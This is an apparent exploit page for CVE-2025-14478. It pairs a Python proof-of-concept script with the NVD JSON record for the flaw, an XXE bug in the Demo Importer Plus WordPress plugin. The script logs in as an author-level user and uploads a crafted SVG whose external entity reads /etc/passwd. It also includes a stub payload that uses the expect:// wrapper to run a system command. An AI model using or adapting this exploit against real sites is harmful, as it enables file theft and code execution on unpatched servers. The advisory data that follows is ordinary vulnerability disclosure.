CVE-2025-14478

import requests import sys # CVE-2025-14478 XXE PoC for Demo Importer Plus < 2.0.9 # Target: WordPress site with Demo Importer Plus plugin TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def get_auth_token(): """Get WordPress authentication nonce""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) return session def exploit_xxe(session): """Upload malicious SVG with XXE payload""" # XXE payload to read /etc/passwd xxe_payload = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg><foo>&xxe;</foo></svg>''' upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" files = { 'file': ('malicious.svg', xxe_payload, 'image/svg+xml') } data = { 'action': 'demo_importer_plus_upload_svg', 'nonce': 'your_nonce_here' # Need valid nonce from page source } response = session.post(upload_url, files=files, data=data) print(f"Response: {response.text}") def exploit_rce(session): """RCE payload for PHP < 8.0 using expect wrapper""" rce_payload = '''<?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "expect://id"> ]> <svg><foo>&xxe;</foo></svg>''' # Similar upload process as above pass if __name__ == "__main__": print("CVE-2025-14478 Demo Importer Plus XXE Exploit") session = get_auth_token() exploit_xxe(session)

{"cve": {"id": "CVE-2025-14478", "sourceIdentifier": "[email protected]", "published": "2026-01-17T08:15:51.040", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Demo Importer Plus plugin for WordPress is vulnerable to XML External Entity Injection (XXE) in all versions up to, and including, 2.0.9 via the SVG file upload functionality. This makes it possible for authenticated attackers, with Author-level access and above, to achieve code execution in vulnerable configurations. This only impacts sites on versions of PHP older than 8.0."}, {"lang": "es", "value": "El plugin Demo Importer Plus para WordPress es vulnerable a la Inyección de Entidad Externa XML (XXE) en todas las versiones hasta la 2.0.9, inclusive, a través de la funcionalidad de carga de archivos SVG. Esto permite a atacantes autenticados, con acceso de nivel de Autor y superior, lograr la ejecución de código en configuraciones vulnerables. Esto solo afecta a sitios en versiones de PHP anteriores a la 8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/demo-importer-plus/tags/2.0.6/inc/importers/class-demo-importer-plus-sites-helper.php#L88", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/demo-importer-plus/trunk/inc/importers/class-demo-importer-plus-sites-helper.php#L88", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3439643/demo-importer-plus/trunk/inc/importers/class-demo-importer-plus-sites-helper.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2971aa0-8287-4142-bd04-7aec1ed92e7b?source=cve", "source": "[email protected]"}]}}